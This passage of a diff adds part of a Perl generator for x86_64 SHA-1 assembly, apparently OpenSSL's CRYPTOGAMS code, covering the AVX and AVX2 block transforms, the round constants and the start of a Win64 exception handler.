+	&vpxor	(@X[0],@X[0],@X[-4&7]);		# "X[0]"^="X[-16]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpxor	(@Tx[0],@Tx[0],@X[-2&7]);	# "X[-3]"^"X[-8]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpxor	(@X[0],@X[0],@Tx[0]);		# "X[0]"^="X[-3]"^"X[-8]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vmovdqa	(eval(16*(($Xi-1)&3))."(%rsp)",@Tx[1]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpsrld	(@Tx[0],@X[0],31);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpslldq(@Tx[2],@X[0],12);		# "X[0]"<<96, extract one dword
+	&vpaddd	(@X[0],@X[0],@X[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpsrld	(@Tx[1],@Tx[2],30);
+	&vpor	(@X[0],@X[0],@Tx[0]);		# "X[0]"<<<=1
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpslld	(@Tx[2],@Tx[2],2);
+	&vpxor	(@X[0],@X[0],@Tx[1]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpxor	(@X[0],@X[0],@Tx[2]);		# "X[0]"^=("X[0]">>96)<<<2
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vmovdqa	($Kx,eval(2*16*(($Xi)/5)-64)."($K_XX_XX)")	if ($Xi%5==0);	# K_XX_XX
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+
+	 foreach (@insns) { eval; }	# remaining instructions [if any]
+
+  $Xi++;	push(@X,shift(@X));	# "rotate" X[]
+}
+
+sub Xupdate_avx_32_79()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 to 44 instructions
+  my ($a,$b,$c,$d,$e);
+
+	&vpalignr(@Tx[0],@X[-1&7],@X[-2&7],8);	# compose "X[-6]"
+	&vpxor	(@X[0],@X[0],@X[-4&7]);		# "X[0]"="X[-32]"^"X[-16]"
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+
+	&vpxor	(@X[0],@X[0],@X[-7&7]);		# "X[0]"^="X[-28]"
+	 eval(shift(@insns));
+	 eval(shift(@insns))	if (@insns[0] !~ /&ro[rl]/);
+	  &vpaddd	(@Tx[1],$Kx,@X[-1&7]);
+	  &vmovdqa	($Kx,eval(2*16*($Xi/5)-64)."($K_XX_XX)")	if ($Xi%5==0);
+	 eval(shift(@insns));		# ror
+	 eval(shift(@insns));
+
+	&vpxor	(@X[0],@X[0],@Tx[0]);		# "X[0]"^="X[-6]"
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+
+	&vpsrld	(@Tx[0],@X[0],30);
+	  &vmovdqa	(eval(16*(($Xi-1)&3))."(%rsp)",@Tx[1]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	 eval(shift(@insns));
+
+	&vpslld	(@X[0],@X[0],2);
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	 eval(shift(@insns));
+
+	&vpor	(@X[0],@X[0],@Tx[0]);		# "X[0]"<<<=2
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+
+	 foreach (@insns) { eval; }	# remaining instructions
+
+  $Xi++;	push(@X,shift(@X));	# "rotate" X[]
+}
+
+sub Xuplast_avx_80()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));
+	  &vpaddd	(@Tx[1],$Kx,@X[-1&7]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	  &vmovdqa	(eval(16*(($Xi-1)&3))."(%rsp)",@Tx[1]);	# X[]+K xfer IALU
+
+	 foreach (@insns) { eval; }		# remaining instructions
+
+	&cmp	($inp,$num);
+	&je	($done_avx_label);
+
+	&vmovdqa(@X[2],"64($K_XX_XX)");		# pbswap mask
+	&vmovdqa($Kx,"-64($K_XX_XX)");		# K_00_19
+	&vmovdqu(@X[-4&7],"0($inp)");		# load input
+	&vmovdqu(@X[-3&7],"16($inp)");
+	&vmovdqu(@X[-2&7],"32($inp)");
+	&vmovdqu(@X[-1&7],"48($inp)");
+	&vpshufb(@X[-4&7],@X[-4&7],@X[2]);	# byte swap
+	&add	($inp,64);
+
+  $Xi=0;
+}
+
+sub Xloop_avx()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vpshufb(@X[($Xi-3)&7],@X[($Xi-3)&7],@X[2]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vpaddd	(@X[$Xi&7],@X[($Xi-4)&7],$Kx);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vmovdqa(eval(16*$Xi)."(%rsp)",@X[$Xi&7]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	foreach (@insns) { eval; }
+  $Xi++;
+}
+
+sub Xtail_avx()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	foreach (@insns) { eval; }
+}
+
+$code.=<<___;
+.align	16
+.Loop_avx:
+___
+	&Xupdate_avx_16_31(\&body_00_19);
+	&Xupdate_avx_16_31(\&body_00_19);
+	&Xupdate_avx_16_31(\&body_00_19);
+	&Xupdate_avx_16_31(\&body_00_19);
+	&Xupdate_avx_32_79(\&body_00_19);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xupdate_avx_32_79(\&body_40_59);
+	&Xupdate_avx_32_79(\&body_40_59);
+	&Xupdate_avx_32_79(\&body_40_59);
+	&Xupdate_avx_32_79(\&body_40_59);
+	&Xupdate_avx_32_79(\&body_40_59);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xuplast_avx_80(\&body_20_39);	# can jump to "done"
+
+				$saved_j=$j; @saved_V=@V;
+
+	&Xloop_avx(\&body_20_39);
+	&Xloop_avx(\&body_20_39);
+	&Xloop_avx(\&body_20_39);
+
+$code.=<<___;
+	add	0($ctx),$A			# update context
+	add	4($ctx),@T[0]
+	add	8($ctx),$C
+	add	12($ctx),$D
+	mov	$A,0($ctx)
+	add	16($ctx),$E
+	mov	@T[0],4($ctx)
+	mov	@T[0],$B			# magic seed
+	mov	$C,8($ctx)
+	mov	$C,@T[1]
+	mov	$D,12($ctx)
+	xor	$D,@T[1]
+	mov	$E,16($ctx)
+	and	@T[1],@T[0]
+	jmp	.Loop_avx
+
+.align	16
+$done_avx_label:
+___
+				$j=$saved_j; @V=@saved_V;
+
+	&Xtail_avx(\&body_20_39);
+	&Xtail_avx(\&body_20_39);
+	&Xtail_avx(\&body_20_39);
+
+$code.=<<___;
+	vzeroupper
+
+	add	0($ctx),$A			# update context
+	add	4($ctx),@T[0]
+	add	8($ctx),$C
+	mov	$A,0($ctx)
+	add	12($ctx),$D
+	mov	@T[0],4($ctx)
+	add	16($ctx),$E
+	mov	$C,8($ctx)
+	mov	$D,12($ctx)
+	mov	$E,16($ctx)
+___
+$code.=<<___ if ($win64);
+	movaps	-40-6*16(%r14),%xmm6
+	movaps	-40-5*16(%r14),%xmm7
+	movaps	-40-4*16(%r14),%xmm8
+	movaps	-40-3*16(%r14),%xmm9
+	movaps	-40-2*16(%r14),%xmm10
+	movaps	-40-1*16(%r14),%xmm11
+___
+$code.=<<___;
+	lea	(%r14),%rsi
+	mov	-40(%rsi),%r14
+	mov	-32(%rsi),%r13
+	mov	-24(%rsi),%r12
+	mov	-16(%rsi),%rbp
+	mov	-8(%rsi),%rbx
+	lea	(%rsi),%rsp
+.Lepilogue_avx:
+	ret
+.size	sha1_block_data_order_avx,.-sha1_block_data_order_avx
+___
+
+if ($avx>1) {
+use integer;
+$Xi=4;					# reset variables
+@X=map("%ymm$_",(4..7,0..3));
+@Tx=map("%ymm$_",(8..10));
+$Kx="%ymm11";
+$j=0;
+
+my @ROTX=("%eax","%ebp","%ebx","%ecx","%edx","%esi");
+my ($a5,$t0)=("%r12d","%edi");
+
+my ($A,$F,$B,$C,$D,$E)=@ROTX;
+my $rx=0;
+my $frame="%r13";
+
+$code.=<<___;
+.type	sha1_block_data_order_avx2,\@function,3
+.align	16
+sha1_block_data_order_avx2:
+_avx2_shortcut:
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	lea	-6*16(%rsp),%rsp
+	vmovaps	%xmm6,-40-6*16(%rax)
+	vmovaps	%xmm7,-40-5*16(%rax)
+	vmovaps	%xmm8,-40-4*16(%rax)
+	vmovaps	%xmm9,-40-3*16(%rax)
+	vmovaps	%xmm10,-40-2*16(%rax)
+	vmovaps	%xmm11,-40-1*16(%rax)
+.Lprologue_avx2:
+___
+$code.=<<___;
+	mov	%rax,%r14		# original %rsp
+	mov	%rdi,$ctx		# reassigned argument
+	mov	%rsi,$inp		# reassigned argument
+	mov	%rdx,$num		# reassigned argument
+
+	lea	-640(%rsp),%rsp
+	shl	\$6,$num
+	 lea	64($inp),$frame
+	and	\$-128,%rsp
+	add	$inp,$num
+	lea	K_XX_XX+64(%rip),$K_XX_XX
+
+	mov	0($ctx),$A		# load context
+	 cmp	$num,$frame
+	 cmovae	$inp,$frame		# next or same block
+	mov	4($ctx),$F
+	mov	8($ctx),$C
+	mov	12($ctx),$D
+	mov	16($ctx),$E
+	vmovdqu	64($K_XX_XX),@X[2]	# pbswap mask
+
+	vmovdqu		($inp),%xmm0
+	vmovdqu		16($inp),%xmm1
+	vmovdqu		32($inp),%xmm2
+	vmovdqu		48($inp),%xmm3
+	lea		64($inp),$inp
+	vinserti128	\$1,($frame),@X[-4&7],@X[-4&7]
+	vinserti128	\$1,16($frame),@X[-3&7],@X[-3&7]
+	vpshufb		@X[2],@X[-4&7],@X[-4&7]
+	vinserti128	\$1,32($frame),@X[-2&7],@X[-2&7]
+	vpshufb		@X[2],@X[-3&7],@X[-3&7]
+	vinserti128	\$1,48($frame),@X[-1&7],@X[-1&7]
+	vpshufb		@X[2],@X[-2&7],@X[-2&7]
+	vmovdqu		-64($K_XX_XX),$Kx	# K_00_19
+	vpshufb		@X[2],@X[-1&7],@X[-1&7]
+
+	vpaddd	$Kx,@X[-4&7],@X[0]	# add K_00_19
+	vpaddd	$Kx,@X[-3&7],@X[1]
+	vmovdqu	@X[0],0(%rsp)		# X[]+K xfer to IALU
+	vpaddd	$Kx,@X[-2&7],@X[2]
+	vmovdqu	@X[1],32(%rsp)
+	vpaddd	$Kx,@X[-1&7],@X[3]
+	vmovdqu	@X[2],64(%rsp)
+	vmovdqu	@X[3],96(%rsp)
+___
+for (;$Xi<8;$Xi++) {	# Xupdate_avx2_16_31
+    use integer;
+
+	&vpalignr(@X[0],@X[-3&7],@X[-4&7],8);	# compose "X[-14]" in "X[0]"
+	&vpsrldq(@Tx[0],@X[-1&7],4);		# "X[-3]", 3 dwords
+	&vpxor	(@X[0],@X[0],@X[-4&7]);		# "X[0]"^="X[-16]"
+	&vpxor	(@Tx[0],@Tx[0],@X[-2&7]);	# "X[-3]"^"X[-8]"
+	&vpxor	(@X[0],@X[0],@Tx[0]);		# "X[0]"^="X[-3]"^"X[-8]"
+	&vpsrld	(@Tx[0],@X[0],31);
+	&vmovdqu($Kx,eval(2*16*(($Xi)/5)-64)."($K_XX_XX)")	if ($Xi%5==0);	# K_XX_XX
+	&vpslldq(@Tx[2],@X[0],12);		# "X[0]"<<96, extract one dword
+	&vpaddd	(@X[0],@X[0],@X[0]);
+	&vpsrld	(@Tx[1],@Tx[2],30);
+	&vpor	(@X[0],@X[0],@Tx[0]);		# "X[0]"<<<=1
+	&vpslld	(@Tx[2],@Tx[2],2);
+	&vpxor	(@X[0],@X[0],@Tx[1]);
+	&vpxor	(@X[0],@X[0],@Tx[2]);		# "X[0]"^=("X[0]">>96)<<<2
+	&vpaddd	(@Tx[1],@X[0],$Kx);
+	&vmovdqu("32*$Xi(%rsp)",@Tx[1]);	# X[]+K xfer to IALU
+
+	push(@X,shift(@X));	# "rotate" X[]
+}
+$code.=<<___;
+	lea	128(%rsp),$frame
+	jmp	.Loop_avx2
+.align	32
+.Loop_avx2:
+	rorx	\$2,$F,$B
+	andn	$D,$F,$t0
+	and	$C,$F
+	xor	$t0,$F
+___
+sub bodyx_00_19 () {	# 8 instructions, 3 cycles critical path
+	# at start $f=(b&c)^(~b&d), $b>>>=2
+	return &bodyx_20_39() if ($rx==19); $rx++;
+	(
+	'($a,$f,$b,$c,$d,$e)=@ROTX;'.
+
+	'&add	($e,((32*($j/4)+4*($j%4))%256-128)."($frame)");'.	# e+=X[i]+K
+	 '&lea	($frame,"256($frame)")	if ($j%32==31);',
+	'&andn	($t0,$a,$c)',			# ~b&d for next round
+
+	'&add	($e,$f)',			# e+=(b&c)^(~b&d)
+	'&rorx	($a5,$a,27)',			# a<<<5
+	'&rorx	($f,$a,2)',			# b>>>2 for next round
+	'&and	($a,$b)',			# b&c for next round
+
+	'&add	($e,$a5)',			# e+=a<<<5
+	'&xor	($a,$t0);'.			# f=(b&c)^(~b&d) for next round
+
+	'unshift(@ROTX,pop(@ROTX)); $j++;'
+	)
+}
+
+sub bodyx_20_39 () {	# 7 instructions, 2 cycles critical path
+	# on entry $f=b^c^d, $b>>>=2
+	return &bodyx_40_59() if ($rx==39); $rx++;
+	(
+	'($a,$f,$b,$c,$d,$e)=@ROTX;'.
+
+	'&add	($e,((32*($j/4)+4*($j%4))%256-128)."($frame)");'.	# e+=X[i]+K
+	 '&lea	($frame,"256($frame)")	if ($j%32==31);',
+
+	'&lea	($e,"($e,$f)")',		# e+=b^c^d
+	'&rorx	($a5,$a,27)',			# a<<<5
+	'&rorx	($f,$a,2)	if ($j<79)',	# b>>>2 in next round
+	'&xor	($a,$b)		if ($j<79)',	# b^c for next round
+
+	'&add	($e,$a5)',			# e+=a<<<5
+	'&xor	($a,$c)		if ($j<79);'.	# f=b^c^d for next round
+
+	'unshift(@ROTX,pop(@ROTX)); $j++;'
+	)
+}
+
+sub bodyx_40_59 () {	# 10 instructions, 3 cycles critical path
+	# on entry $f=((b^c)&(c^d)), $b>>>=2
+	$rx++;
+	(
+	'($a,$f,$b,$c,$d,$e)=@ROTX;'.
+
+	'&add	($e,((32*($j/4)+4*($j%4))%256-128)."($frame)");'.	# e+=X[i]+K
+	 '&lea	($frame,"256($frame)")	if ($j%32==31);',
+	'&xor	($f,$c)		if ($j>39)',	# (b^c)&(c^d)^c
+	'&mov	($t0,$b)	if ($j<59)',	# count on zero latency
+	'&xor	($t0,$c)	if ($j<59)',	# c^d for next round
+
+	'&lea	($e,"($e,$f)")',		# e+=(b^c)&(c^d)^c
+	'&rorx	($a5,$a,27)',			# a<<<5
+	'&rorx	($f,$a,2)',			# b>>>2 in next round
+	'&xor	($a,$b)',			# b^c for next round
+
+	'&add	($e,$a5)',			# e+=a<<<5
+	'&and	($a,$t0)	if ($j< 59);'.	# f=(b^c)&(c^d) for next round
+	'&xor	($a,$c)		if ($j==59);'.	# f=b^c^d for next round
+
+	'unshift(@ROTX,pop(@ROTX)); $j++;'
+	)
+}
+
+sub Xupdate_avx2_16_31()		# recall that $Xi starts wtih 4
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body,&$body);	# 35 instructions
+  my ($a,$b,$c,$d,$e);
+
+	&vpalignr(@X[0],@X[-3&7],@X[-4&7],8);	# compose "X[-14]" in "X[0]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpsrldq(@Tx[0],@X[-1&7],4);		# "X[-3]", 3 dwords
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpxor	(@X[0],@X[0],@X[-4&7]);		# "X[0]"^="X[-16]"
+	&vpxor	(@Tx[0],@Tx[0],@X[-2&7]);	# "X[-3]"^"X[-8]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpxor	(@X[0],@X[0],@Tx[0]);		# "X[0]"^="X[-3]"^"X[-8]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpsrld	(@Tx[0],@X[0],31);
+	&vmovdqu($Kx,eval(2*16*(($Xi)/5)-64)."($K_XX_XX)")	if ($Xi%5==0);	# K_XX_XX
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpslldq(@Tx[2],@X[0],12);		# "X[0]"<<96, extract one dword
+	&vpaddd	(@X[0],@X[0],@X[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpsrld	(@Tx[1],@Tx[2],30);
+	&vpor	(@X[0],@X[0],@Tx[0]);		# "X[0]"<<<=1
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpslld	(@Tx[2],@Tx[2],2);
+	&vpxor	(@X[0],@X[0],@Tx[1]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpxor	(@X[0],@X[0],@Tx[2]);		# "X[0]"^=("X[0]">>96)<<<2
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpaddd	(@Tx[1],@X[0],$Kx);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vmovdqu(eval(32*($Xi))."(%rsp)",@Tx[1]);	# X[]+K xfer to IALU
+
+	 foreach (@insns) { eval; }	# remaining instructions [if any]
+
+	$Xi++;
+	push(@X,shift(@X));	# "rotate" X[]
+}
+
+sub Xupdate_avx2_32_79()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body,&$body);	# 35 to 50 instructions
+  my ($a,$b,$c,$d,$e);
+
+	&vpalignr(@Tx[0],@X[-1&7],@X[-2&7],8);	# compose "X[-6]"
+	&vpxor	(@X[0],@X[0],@X[-4&7]);		# "X[0]"="X[-32]"^"X[-16]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpxor	(@X[0],@X[0],@X[-7&7]);		# "X[0]"^="X[-28]"
+	&vmovdqu($Kx,eval(2*16*($Xi/5)-64)."($K_XX_XX)")	if ($Xi%5==0);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpxor	(@X[0],@X[0],@Tx[0]);		# "X[0]"^="X[-6]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpsrld	(@Tx[0],@X[0],30);
+	&vpslld	(@X[0],@X[0],2);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	#&vpslld	(@X[0],@X[0],2);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpor	(@X[0],@X[0],@Tx[0]);		# "X[0]"<<<=2
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpaddd	(@Tx[1],@X[0],$Kx);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vmovdqu("32*$Xi(%rsp)",@Tx[1]);	# X[]+K xfer to IALU
+
+	 foreach (@insns) { eval; }	# remaining instructions
+
+	$Xi++;
+	push(@X,shift(@X));	# "rotate" X[]
+}
+
+sub Xloop_avx2()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 foreach (@insns) { eval; }
+}
+
+	&align32();
+	&Xupdate_avx2_32_79(\&bodyx_00_19);
+	&Xupdate_avx2_32_79(\&bodyx_00_19);
+	&Xupdate_avx2_32_79(\&bodyx_00_19);
+	&Xupdate_avx2_32_79(\&bodyx_00_19);
+
+	&Xupdate_avx2_32_79(\&bodyx_20_39);
+	&Xupdate_avx2_32_79(\&bodyx_20_39);
+	&Xupdate_avx2_32_79(\&bodyx_20_39);
+	&Xupdate_avx2_32_79(\&bodyx_20_39);
+
+	&align32();
+	&Xupdate_avx2_32_79(\&bodyx_40_59);
+	&Xupdate_avx2_32_79(\&bodyx_40_59);
+	&Xupdate_avx2_32_79(\&bodyx_40_59);
+	&Xupdate_avx2_32_79(\&bodyx_40_59);
+
+	&Xloop_avx2(\&bodyx_20_39);
+	&Xloop_avx2(\&bodyx_20_39);
+	&Xloop_avx2(\&bodyx_20_39);
+	&Xloop_avx2(\&bodyx_20_39);
+
+$code.=<<___;
+	lea	128($inp),$frame
+	lea	128($inp),%rdi			# borrow $t0
+	cmp	$num,$frame
+	cmovae	$inp,$frame			# next or previous block
+
+	# output is d-e-[a]-f-b-c => A=d,F=e,C=f,D=b,E=c
+	add	0($ctx),@ROTX[0]		# update context
+	add	4($ctx),@ROTX[1]
+	add	8($ctx),@ROTX[3]
+	mov	@ROTX[0],0($ctx)
+	add	12($ctx),@ROTX[4]
+	mov	@ROTX[1],4($ctx)
+	 mov	@ROTX[0],$A			# A=d
+	add	16($ctx),@ROTX[5]
+	 mov	@ROTX[3],$a5
+	mov	@ROTX[3],8($ctx)
+	 mov	@ROTX[4],$D			# D=b
+	 #xchg	@ROTX[5],$F			# F=c, C=f
+	mov	@ROTX[4],12($ctx)
+	 mov	@ROTX[1],$F			# F=e
+	mov	@ROTX[5],16($ctx)
+	#mov	$F,16($ctx)
+	 mov	@ROTX[5],$E			# E=c
+	 mov	$a5,$C				# C=f
+	 #xchg	$F,$E				# E=c, F=e
+
+	cmp	$num,$inp
+	je	.Ldone_avx2
+___
+
+$Xi=4;				# reset variables
+@X=map("%ymm$_",(4..7,0..3));
+
+$code.=<<___;
+	vmovdqu	64($K_XX_XX),@X[2]		# pbswap mask
+	cmp	$num,%rdi			# borrowed $t0
+	ja	.Last_avx2
+
+	vmovdqu		-64(%rdi),%xmm0		# low part of @X[-4&7]
+	vmovdqu		-48(%rdi),%xmm1
+	vmovdqu		-32(%rdi),%xmm2
+	vmovdqu		-16(%rdi),%xmm3
+	vinserti128	\$1,0($frame),@X[-4&7],@X[-4&7]
+	vinserti128	\$1,16($frame),@X[-3&7],@X[-3&7]
+	vinserti128	\$1,32($frame),@X[-2&7],@X[-2&7]
+	vinserti128	\$1,48($frame),@X[-1&7],@X[-1&7]
+	jmp	.Last_avx2
+
+.align	32
+.Last_avx2:
+	lea	128+16(%rsp),$frame
+	rorx	\$2,$F,$B
+	andn	$D,$F,$t0
+	and	$C,$F
+	xor	$t0,$F
+	sub	\$-128,$inp
+___
+	$rx=$j=0;	@ROTX=($A,$F,$B,$C,$D,$E);
+
+	&Xloop_avx2	(\&bodyx_00_19);
+	&Xloop_avx2	(\&bodyx_00_19);
+	&Xloop_avx2	(\&bodyx_00_19);
+	&Xloop_avx2	(\&bodyx_00_19);
+
+	&Xloop_avx2	(\&bodyx_20_39);
+	  &vmovdqu	($Kx,"-64($K_XX_XX)");		# K_00_19
+	  &vpshufb	(@X[-4&7],@X[-4&7],@X[2]);	# byte swap
+	&Xloop_avx2	(\&bodyx_20_39);
+	  &vpshufb	(@X[-3&7],@X[-3&7],@X[2]);
+	  &vpaddd	(@Tx[0],@X[-4&7],$Kx);		# add K_00_19
+	&Xloop_avx2	(\&bodyx_20_39);
+	  &vmovdqu	("0(%rsp)",@Tx[0]);
+	  &vpshufb	(@X[-2&7],@X[-2&7],@X[2]);
+	  &vpaddd	(@Tx[1],@X[-3&7],$Kx);
+	&Xloop_avx2	(\&bodyx_20_39);
+	  &vmovdqu	("32(%rsp)",@Tx[1]);
+	  &vpshufb	(@X[-1&7],@X[-1&7],@X[2]);
+	  &vpaddd	(@X[2],@X[-2&7],$Kx);
+
+	&Xloop_avx2	(\&bodyx_40_59);
+	&align32	();
+	  &vmovdqu	("64(%rsp)",@X[2]);
+	  &vpaddd	(@X[3],@X[-1&7],$Kx);
+	&Xloop_avx2	(\&bodyx_40_59);
+	  &vmovdqu	("96(%rsp)",@X[3]);
+	&Xloop_avx2	(\&bodyx_40_59);
+	&Xupdate_avx2_16_31(\&bodyx_40_59);
+
+	&Xupdate_avx2_16_31(\&bodyx_20_39);
+	&Xupdate_avx2_16_31(\&bodyx_20_39);
+	&Xupdate_avx2_16_31(\&bodyx_20_39);
+	&Xloop_avx2	(\&bodyx_20_39);
+
+$code.=<<___;
+	lea	128(%rsp),$frame
+
+	# output is d-e-[a]-f-b-c => A=d,F=e,C=f,D=b,E=c
+	add	0($ctx),@ROTX[0]		# update context
+	add	4($ctx),@ROTX[1]
+	add	8($ctx),@ROTX[3]
+	mov	@ROTX[0],0($ctx)
+	add	12($ctx),@ROTX[4]
+	mov	@ROTX[1],4($ctx)
+	 mov	@ROTX[0],$A			# A=d
+	add	16($ctx),@ROTX[5]
+	 mov	@ROTX[3],$a5
+	mov	@ROTX[3],8($ctx)
+	 mov	@ROTX[4],$D			# D=b
+	 #xchg	@ROTX[5],$F			# F=c, C=f
+	mov	@ROTX[4],12($ctx)
+	 mov	@ROTX[1],$F			# F=e
+	mov	@ROTX[5],16($ctx)
+	#mov	$F,16($ctx)
+	 mov	@ROTX[5],$E			# E=c
+	 mov	$a5,$C				# C=f
+	 #xchg	$F,$E				# E=c, F=e
+
+	cmp	$num,$inp
+	jbe	.Loop_avx2
+
+.Ldone_avx2:
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	movaps	-40-6*16(%r14),%xmm6
+	movaps	-40-5*16(%r14),%xmm7
+	movaps	-40-4*16(%r14),%xmm8
+	movaps	-40-3*16(%r14),%xmm9
+	movaps	-40-2*16(%r14),%xmm10
+	movaps	-40-1*16(%r14),%xmm11
+___
+$code.=<<___;
+	lea	(%r14),%rsi
+	mov	-40(%rsi),%r14
+	mov	-32(%rsi),%r13
+	mov	-24(%rsi),%r12
+	mov	-16(%rsi),%rbp
+	mov	-8(%rsi),%rbx
+	lea	(%rsi),%rsp
+.Lepilogue_avx2:
+	ret
+.size	sha1_block_data_order_avx2,.-sha1_block_data_order_avx2
+___
+}
+}
+$code.=<<___;
+.align	64
+K_XX_XX:
+.long	0x5a827999,0x5a827999,0x5a827999,0x5a827999	# K_00_19
+.long	0x5a827999,0x5a827999,0x5a827999,0x5a827999	# K_00_19
+.long	0x6ed9eba1,0x6ed9eba1,0x6ed9eba1,0x6ed9eba1	# K_20_39
+.long	0x6ed9eba1,0x6ed9eba1,0x6ed9eba1,0x6ed9eba1	# K_20_39
+.long	0x8f1bbcdc,0x8f1bbcdc,0x8f1bbcdc,0x8f1bbcdc	# K_40_59
+.long	0x8f1bbcdc,0x8f1bbcdc,0x8f1bbcdc,0x8f1bbcdc	# K_40_59
+.long	0xca62c1d6,0xca62c1d6,0xca62c1d6,0xca62c1d6	# K_60_79
+.long	0xca62c1d6,0xca62c1d6,0xca62c1d6,0xca62c1d6	# K_60_79
+.long	0x00010203,0x04050607,0x08090a0b,0x0c0d0e0f	# pbswap mask
+.long	0x00010203,0x04050607,0x08090a0b,0x0c0d0e0f	# pbswap mask
+.byte	0xf,0xe,0xd,0xc,0xb,0xa,0x9,0x8,0x7,0x6,0x5,0x4,0x3,0x2,0x1,0x0
+___
+}}}
+$code.=<<___;
+.asciz	"SHA1 block transform for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
+.align	64
+___
+
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+if ($win64) {
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	se_handler,\@abi-omnipotent
+.align	16
+se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	lea	.Lprologue(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<.Lprologue
+	jb	.Lcommon_seh_tail
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	lea	.Lepilogue(%rip),%r10
